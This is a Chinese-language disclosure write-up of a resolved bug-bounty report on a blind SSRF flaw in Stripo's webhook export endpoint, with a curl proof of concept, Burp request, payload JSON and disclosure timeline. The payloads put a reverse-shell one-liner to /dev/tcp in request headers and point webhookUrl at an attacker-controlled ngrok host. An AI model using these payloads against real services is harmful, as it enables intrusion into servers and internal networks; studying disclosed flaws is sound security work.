Stripo邮箱编辑器Blind SSRF漏洞分析与利用详情
漏洞概述
本报告涵盖在Stripo导出服务中发现的一个严重的Blind SSRF(服务器端请求伪造)漏洞。SSRF漏洞允许攻击者操纵服务器,使其向内部或外部系统发起任意请求,可能导致严重的安全漏洞。该漏洞存在于端点 /exportservice/v3/exports/WEBHOOK/accounts。通过在 webhookUrl 参数中提供恶意输入,攻击者可以触发SSRF,使服务器能够向攻击者控制的系统发起未经授权的HTTP请求。
漏洞利用详情
概念验证(PoC)
以下curl命令演示了漏洞利用过程:
curl -i -X POST 'https://my.stripo.email/bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412' \
--data '{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}'
生成的HTTP请求
处理时,应用程序会向指定的webhookUrl生成以下HTTP请求:
POST /webhook/sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.100.3%2F9001%200%3E%261/ HTTP/1.1
Host: 5290-101-255-157-9.ngrok-free.app
User-Agent: Apache-HttpClient/4.5.14 (Java/21.0.5)
Content-Length: 104
Accept: application/json
Accept-Encoding: gzip,deflate
Traceparent: 00-58ae5f178436f516dfed5bcabe66e0a4-6f1c4d73cae918b9-00
X-Forwarded-For: 54.247.167.106
X-Forwarded-Host: 5290-101-255-157-9.ngrok-free.app
X-Forwarded-Proto: https
通过Burp Suite发起的HTTP请求
POST /bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412 HTTP/1.1
Host: my.stripo.email
Content-Type: application/json
Content-Length: 457
{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}
攻击载荷
{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}
影响
- 数据泄露:攻击者可利用SSRF访问敏感的内部网络数据,例如云元数据、内部API端点或其他受限服务。
- 端口扫描:可利用该漏洞进行端口扫描。
- 内部资源访问:Blind SSRF允许访问内部服务或端点,绕过网络限制。
- 组合攻击:可能引发更高级的利用,例如检索敏感元数据或执行远程命令。
处理时间线
- 2025年1月13日:漏洞由odaysec提交给Stripo Inc。
- 2025年1月21日:Stripo员工nikandrov_nikolai将状态更改为“已分类”,并创建任务进行解决。
- 2025年4月23日:odaysec复查漏洞,确认端点
/bapi/exportservice/v3/exports/webhook/accounts/{uid}的问题已修复,请求将报告标记为已解决。 - 同日:Stripo员工nikandrov_nikolai关闭报告并将状态更改为“已解决”。
- 同日:odaysec请求披露此报告并获得同意。
- 3天前:本报告已被披露。
报告详情
- 报告ID:#2932960
- 状态:已解决
- 严重性:严重 (9 ~ 10)
- 披露日期:2025年12月1日
- 弱点:服务器端请求伪造 (SSRF)
- CVE ID:无
- 赏金:隐藏
- 账户详情:无
biOK/hzhVF2yKaGc5mK8oUeM+Q0dUCqUnNt5/B4HEmm4zetCE0QDP5gVzmN/R22E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
公众号二维码
公众号二维码
浙公网安备 33010602011771号